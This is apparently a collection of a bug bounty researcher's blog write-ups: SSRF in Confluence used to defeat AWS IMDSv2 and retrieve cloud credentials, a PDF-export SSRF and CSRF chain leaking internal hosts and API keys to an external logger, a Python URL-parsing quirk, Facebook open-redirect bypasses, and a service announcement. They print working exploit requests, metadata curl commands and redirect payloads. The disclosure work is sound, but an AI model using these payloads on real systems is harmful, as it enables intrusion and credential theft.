The attackers took advantage of an SSRF (Server-Side Request Forgery) vulnerability to gain unauthorized access to their AWS infrastructure but before this incident, exploiting this class of vulnerability to exfiltrate AWS security credentials was almost straightforward since organizations relied on EC2 Instance Metadata Service v1 (IMDSv1) which is less secure as it allows reaching the metadata endpoint located at http://169.254.169.254 with a simple GET request within the instance.

Since then, AWS has decided to roll out IMDSv2 as an in-depth defense to reduce the likelihood of a successful SSRF exploitation against this endpoint, so now it only accepts authenticated requests and works as follows:

Source: https://medium.com/@shurmajee/aws-enhances-metadata-service-security-with-imdsv2-b5d4b238454b

Essentially, you will need to send a PUT request to http://169.254.169.254/latest/api/token with the following header X-aws-ec2-metadata-token-ttl-seconds: 21600, then you’ll receive a session token that’s valid for up to 6 hours (21600 seconds) which can be used as many times as you want but only from the same EC2 instance where that session began.

curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"

Next, you can request the metadata endpoint http://169.254.169.254/latest/meta-data/profile by sending the following HTTP header: X-aws-ec2-metadata-token: $TOKEN along with the request and appending by appending the session token to it ($TOKEN).

curl http://169.254.169.254/latest/meta-data/profile -H "X-aws-ec2-metadata-token: $TOKEN"

As you might have experienced yourself, the majority of SSRF vulnerabilities are limited to a GET request so this is supposed to make it fairly difficult and challenging to exploit them unless the attacker has full control over the HTTP method and HTTP headers.

Thái Vũ and I were collaborating on this bug bounty program for which the initial subdomains reconnaissance identified a couple of Atlassian Confluence instances.

http://confluence.dev.████████.com
http://confluence.production.dev.████████.com
http://confluencesecurity.staging.dev.████████.com

We’re going to use all these instances interchangeably throughout this post but we confirmed they were all vulnerable to CVE-2019-8451 using Burpsuite Collaborator as follows:

POST /plugins/servlet/gadgets/makeRequest?url=http://03jve28sg5djvfbj9f00xzjogz.burpcollaborator.net/ HTTP/1.1
Host: confluence.dev.████████.com
User-Agent: Mozilla/5.0
Accept: */*
X-Atlassian-Token: no-check
Content-Length: 322
Content-Type: application/x-www-form-urlencoded
Connection: close

And we got a hit:

The next step was to find a way to reach their internal network but that was fortunately straightforward by pointing URL to 127.0.0.1 and running Burp Intruder on the port part to enumerate all the available services they might be using internally. It turned out there wasn’t much as we only found two open ports:

Nginx web server and proxy running on port 80:

and the confluence instance itself running on port 5000:

We went ahead and confirmed the host was running on AWS infrastructure as you can see below:

so, we naturally attempted to reach AWS metadata endpoint by pointing the URL to http://169.254.169.254/ but that didn’t work as it returned 401 - unauthorized status.

It was obvious that the endpoint is indeed accessible but requires some sort of authentication so after some research we concluded that they’re most certainly using IMDSv2 as we aforementioned.

Initially, we thought we hit a dead-end and considered submitting it as P3 at best but we decided to dig a bit further and figure out if there is any way we can control the HTTP request.

Atlassian gadgets use the new Google gadgets.* API defined by the OpenSocial specification so to load dynamic data into the gadget, you will make Ajax calls using gadgets.io.makeRequest() to the remote server - it appears this endpoint takes in various other parameters such as: httpmethod, postData and headers to name a few.

This is everything we needed to make our exploit work so the next step was to leverage these parameters in order to retrieve the session token, so we sent a PUT to http://169.254.169.254/latest/api/token along with X-aws-ec2-metadata-token-ttl-seconds: 21600 header as mentioned earlier. See:

The session token was successfully returned and now it’s time to use it to send an authenticated request to access the metadata endpoint. We found out that makeRequest was accepting POST request too so we did something like this:

POST /plugins/servlet/gadgets/makeRequest HTTP/1.1
Host: confluence.dev.████████.com
User-Agent: Mozilla/5.0
Accept: */*
X-Atlassian-Token: no-check
Content-Length: 322
Content-Type: application/x-www-form-urlencoded
Connection: close

url=http://169.254.169.254/latest/meta-data&httpMethod=GET&headers=X-aws-ec2-metadata-token=AQAEAH7TsExwreOTsHbZjebiYB7ypANA_l6JycUp2g0hDYNN9-kucA==

But this wasn’t working for some reason as it’s still returning 401 so we figured the base64 == at the end of the token might be causing the issue which we confirmed to be stripped out in the request when we tried it against our collaborator endpoint. See:

So we URL-encoded and still didn’t work, we double URL-encoded it then it worked this time and we had the meta-data content returned:

That was such a relief! we also requested http://169.254.169.254/latest/user-data and found a bash script used to automate the installation and deployment of these confluence instances and it surprisingly contained a good amount of hardcoded credentials for PostgreSQL database on AWS RDS, Tenable Nessus agent`, Hibernate connection password, etc.

This is a pretty bad security practice which AWS itself advises against since credentials hosted on the metadata endpoint should be shortlived and expire after a period of time.

Then, to finalize the proof of concept, we naturally had to exfiltrate the EC2 security credentials from http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance before writing up and submitting the report.

If you want to go further, you can validate and enumerate all the other AWS services and permissions these security credentials have access to by using ScoutSuite auditing tool for instance.

ASNLookup service has been around for over 4 years now and I’ve initially built it for security researchers to help them with reconnaissance by identifying IP spaces owned by specific organizations. The service was widely used either through the website, python wrapper or the API endpoint I made available for free. I was running it free of charge which was a bit costly, but at one point in time, it started going down regularly because of companies that were abusing the API that I initially set up for individuals and researchers.

The backend was nothing fancy at all! It was a simple CSV file as a database and a Flask application with one view and python data processor. For the most part, Linux OOM Killer would always terminate the application process when it was running out of memory and can’t handle that much traffic coming from these companies.

Yet, to my surprise, this little service has actually received a sponsoring and acquisition offer from a renowned company dealing in IP and geolocation data. I couldn’t believe someone would be interested in it but I had a feeling it wouldn’t be an interesting offer so it wasn’t worth it, hence I respectfully declined the offer and informed them of my plan to build it out which I, unfortunately, haven’t done.

Fast forward two years, I decided to take it as a fun project so it was time to refactor the codebase and properly build the service as API-as-a-Product to get rid of these greedy companies abusing the free API, or at least monetize it so that it covers, at least, its hosting costs. It was also an opportunity for me to leverage my new acquired knowledge in software engineering and test out Amazon web services as well to become more familiar with.

The new refactored version of ASNLookup API is serverless and leverages additional data sources. It uses Django REST framework that was separately deployed on a Lambda function with AWS API gateway set up to trigger and route HTTP requests to it. The API gateway allows me to secure the endpoint by requiring an API key to be sent as part of HTTP request headers. And the deployment process was fortunately smooth and easy thanks to Zappa which handles all configurations and allows quick updates with a single command.

Since I have no desire to handle payments and billing data nor do I want to spend time building it, I decided to use RapidAPI service to allow users to subscribe to the API and make it available in their API marketplace.

Regarding the database, it uses PostgreSQL whcih was separately hosted on AWS RDS, not to overload the main servers. It was relatively quick and intuitive set up and connect to it but you must be careful with security configurations when you expose the instance publicly.

The main web application is also built with Django and hosted separately on EC2 but I think Amazon pricing for these instances is a bit on the expensive side given the low specs they offer and compared to other cloud providers such as DigitalOcean and Hetzner which I currently use for other projects. I tried to host it elsewhere but the latency was extremely high when I started migrating data from Hetzner server hosted in central EU to AWS RDS in east US - it was ridiculously slow! I assume part of it was caused by the distance between the data centers but it was still unreasonable, therefore I had to switch back to EC2.

Although I used Django internal caching mechanisms to make the application run faster, I also put up Cloudflare CDN in the front to handle traffic and to add an additional security layer but the free DNS level SSL provided was also the cherry on top.

So I’d like present you the new ASNLookup service available at asnlookup.com

I was looking into a private bug bounty program that belongs to an organization offering a network monitoring solution so while poking around and testing out their various features, I ran some network tests using their agent then I took notice of this small feature that allows users to export the results of the test by sending you a PDF copy by e-mail. The request was the following:

GET /api/ui/export/exportPage?format=pdf&emailParams={"email":"yassineaboukir@wearehackerone.com","name":"Yassine","title":"PoC","message":"PoC"}&location=/v4/export/synthetics/tests/780/results
Host: app.████████.com

To my surprise, when I received the PDF report in the e-mail, it was literally a screenshot of the result’s web page so I went back to double check the endpoint and got intrigued by location parameter. I assumed the backend was probably taking a screenshot of the page at /v4/export/synthetics/tests/780/results and e-mailing it to the user.

To verify my assumption, I changed the value of location parameter to point to another authenticated route within the application, such as /v4/onboarding/device-status/80219.

Bingo! it worked as I received a PDF screenshot of that authenticated web page, so I was curious how this feature could be implemented in the backend and if there is any way we can point it to a different host, internal or external. I decided to run some tests as follows:

&location=//example.com
&location=https://example.com

The PDF report contained a screenshot of a 404 error which I was already familiar with, therefore I went with the assumption that the backend was most likely taking the value of location parameter, appending it to the host and then taking a screenshot, i.e:

https://app.████████.com/v4/export/synthetics/tests/780/results

If that is the case, then we can try common SSRF bypasses such as: @example.com or .example.com which, should they work, would result in the backend issuing an HTTP request to:

https://app.████████.com@example.com
https://app.████████.com.example.com

Well, both did work and received the below PDF report in the e-mail:

Since we have a confirmed SSRF, we need to maximize its security impact by attempting to hopefully exploit it against their internal network, so naturally, the first test I ran was pointing the location parameter to internal hosts using various common techniques as described in this repository.

I tried payloads like @127.0.0.1, @localhost, @spoofed.burpcollaborator.net that points to the loopback address, 301 redirection, etc. but unfortunately, none of them worked as I was receiving a blank PDF report.

I looked for more internal hosts other than the typical ones which seem to be blacklisted, therefore I did a quick subdomains reconnaissance using Amass but it didn’t yield anything interesting so I searched on Github and I found a repository that referenced https://redash.iad1.████████.com which appears to be an internal host that was alive but not publicly accessible.

I quickly set the location parameter value to @redash.iad1.████████.com and got this PDF report in the mailbox:

Well, that escalated quickly! The host was running an instance of Redash with the login credentials auto-saved in plain-text. I thought they might be running other DevOps tools under .iad1.████████.com, so I manually fuzzed some popular project names, such as:

- @jenkins.iad1.████████.com
- @k8s.iad1.████████.com
- @github.iad1.████████.com
- Etc.

Then, puppet.iad1.████████.com was the jackpot! puppet is a software used to manage the infrastructure from servers’ configuration, deployment to orchestration, etc. That was the only guess I needed because I received a 10 pages PDF report which literally listed all of their internal hosts as you can see:

I tried to hit a few of these internal endpoints and they seemed to be all accessible:

Elastic:

Kibana:

At this point, we have a nicely exploitable SSRF to report to the program but I decided to explore the vulnerable endpoint a bit further. There are three important notes that I initially dismissed if you refer back to our previous HTTP request:

• The GET endpoint was not protected against CSRF attacks.
• It takes a screenshot of any authenticated web page.
• It sends the screenshot to the address provided in email JSON parameter.

Consequently, by sending a specially crafted URL to a legitimate user, I can screenshot any authenticated page of theirs and send the report to my own e-mail address so the exploit would be as simple as:

https://app.████████.com/api/ui/export/exportPage?format=pdf&emailParams={"email":"yassineaboukir@wearehackerone.com","name":"Yassine","title":"PoC","message":"PoC"}&location=/v4/settings/users

Clicking on the above link would take a screenshot of /v4/settings/users web page and then e-mail it to yassineaboukir@wearehackerone.com which is the attacker’s email address - this was disclosing information for any other authenticated endpoint like networks agents at /v4/synthetics/agents, network classifications at /v4/settings/network-classification.

Afterwards, I set up an HTTP logger at requestcatcher.com then pointed the location parameter to my webhook @testing1337.requestcatcher.com. Unexpectedly, the HTTP request was found to be leaking my account’s e-mail address as well as API key through the its headers: X-CH-Auth-Api-Email, X-CH-Auth-Api-Token.

Therefore, we can leverage this endpoint to leak any organization’s email and API key associated with their account by simply misleading the user to click on:

https://app.████████.com/api/ui/export/exportPage?format=pdf&emailParams={"email":"yassineaboukir@wearehackerone.com","name":"Yassine","title":"PoC","message":"PoC"}&location=@test.requestcatcher.com

At this point, I decided to wrap up my research and submitted a comprehensive report to the program which fixed and rewarded it their maximum bounty award. I’d like to thank ninetynine for their collaboration and thank you for taking time to read until the end.

In this regard, I have built a security and reconnaissance tool that I’ve been using for quite some time. It should allow you to monitor subdomains of specific organizations automatically and get notified each time something is found.

The tool was announced at OWASP Seasides during NullCon 2019 which took place in the beautiful city of Goa, India.

Read more: https://medium.com/@yassineaboukir/automated-monitoring-of-subdomains-for-fun-and-profit-release-of-sublert-634cfc5d7708

from urlparse import urlparse, urlunparse 
urlparse("https://www.example.com/connect/login")
ParseResult(scheme='https', netloc='www.example.com', path='/connect/login', params='', query='', fragment='')

urlparse.urlunparse() function is supposed to reconstruct the components of a URL returned by the urlparse() function back to form of the original URL. However, URLs do not survive the round-trip through urlunparse(urlparse(url)). Python sees ////example.com as a URL with no hostname or scheme therefore considers it a path //example.com.

output = urlparse("////evil.com")
print(output)
ParseResult(scheme='', netloc='', path='//evil.com', params='', query='', fragment='')

As you see, the two slashes are removed and it is marked as a relative-path URL but the issue arises when we reconstruct the URL using urlunparse() function - the URL is treated as an absolute path.

output = urlunparse(output) # from previous output
print(output)
"//evil.com"
urlparse(output) # let's deconstruct the new output
ParseResult(scheme='', netloc='evil.com', path='', params='', query='', fragment='')

We went from a path to a hostname as you can see above after reconstructing the input. Depending on its usage across the code, this inconsistency in parsing URLs could result in a security issue which was indeed demonstrated on Reddit suffering from an open redirect vulnerability caused by this unexpected behavior.

https://github.com/reddit/reddit/commit/689a9554e60c6e403528b5d62a072ac4a072a20e

I reported this issue to Python but it wasn’t resolved and the ticket remains open since then

https://bugs.python.org/issue23505

As you have read in the title, Facebook is vulnerable to an open redirect because some parameters ddin’t not fully validate the input allowing an attacker to redirect the victim to a malicious page. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it.

Vulnerable endpoints

https://www.facebook.com/ads/manage/log/?uri=xxxxx&event=view_power_editor&ad_account_id=1

https://www.facebook.com/browsegroups/addcover/log/?groupid=1&groupuri=xxxxx

Facebook has, indeed, implemented some protection against open redirection since I was not able to perform the attack using some common techniques like you the ones below :

https://www.facebook.com/browsegroups/addcover/log/?groupid=1&groupuri=https://www.evil.com/

https://www.facebook.com/browsegroups/addcover/log/?groupid=1&groupuri=../evil.com

https://www.facebook.com/browsegroups/addcover/log/?groupid=1&groupuri=https://l.facebook.com/l.php?u=https://evil.com

None of the above bypass techniques worked. I was about to give up when I noticed in my Twitter feed some Facebook shortned links that looked like: https://fb.me/7kFH9QAMH (redirects to evil.com). These links were automatically generated if you link your facebook account with Twitter so I quickly got back to my testing and tried to bypass the protection using the shortned link which worked perfectly.

After reporting it to facebook on 13/12/2014 it was fixed on 17/12/2014 and Facebook rewarded me with a 500$ bounty for it.

Proof Of Concept 1:

https://www.facebook.com/browsegroups/addcover/log/?groupid=1&groupuri=https://fb.me/7kFH9QAMH

https://www.facebook.com/browsegroups/addcover/log/?groupid=1&groupuri=https://l.facebook.com/l.php?u=https:// fb.me/7kFH9QAMH

You would be redirected to evil.com.

I went to back to check if somehow I could bypass again the protection. So, I took a deep look at the fb.me domain and I found some subdomains like https://on.fb.me for facebook pages and I tried to guess other valid subdomains. Subsequently, I found this valid subdomain https://d.fb.me/7kFH9QAMH which worked perfectly allowing me to bypass the protection.

Proof Of Concept 2:

https://www.facebook.com/browsegroups/addcover/log/?groupid=1&groupuri=https://d.fb.me/7kFH9QAMH

https://www.facebook.com/browsegroups/addcover/log/?groupid=1&groupuri=https://d.fb.me/7kFH9QAMH

I quickly escalated the bug to Facebook security team on 22/12/2014 and they fixed on 24/12/2014 but they decided not to reward it because it similar to the original one. I was not happy with their decision, so I managed to find a another way to bypass the protection again, hopefully this time they’ll reconsider awarding a bounty for my efforts.

I tried again some new tricks but they all failed then, unintentionally, I added the www to the shortned Facebook link such as https://www.fb.me/7kFH9QAMH and the open redirect worked just fine. With other words, I bypassed Facebook previous fix once again.

Proof Of Concept 3 :

https://www.facebook.com/browsegroups/addcover/log/?groupid=1&groupuri=https://www.fb.me/7kFH9QAMH

https://www.facebook.com/browsegroups/addcover/log/?groupid=1&groupuri=https://www..fb.me/7kFH9QAMH

I followed-up with the security engineer who escalated the bug on 24/12/2014 and it got fixed on 30/12/2014 and, luckily, Facebook decided to reward 500$ for it.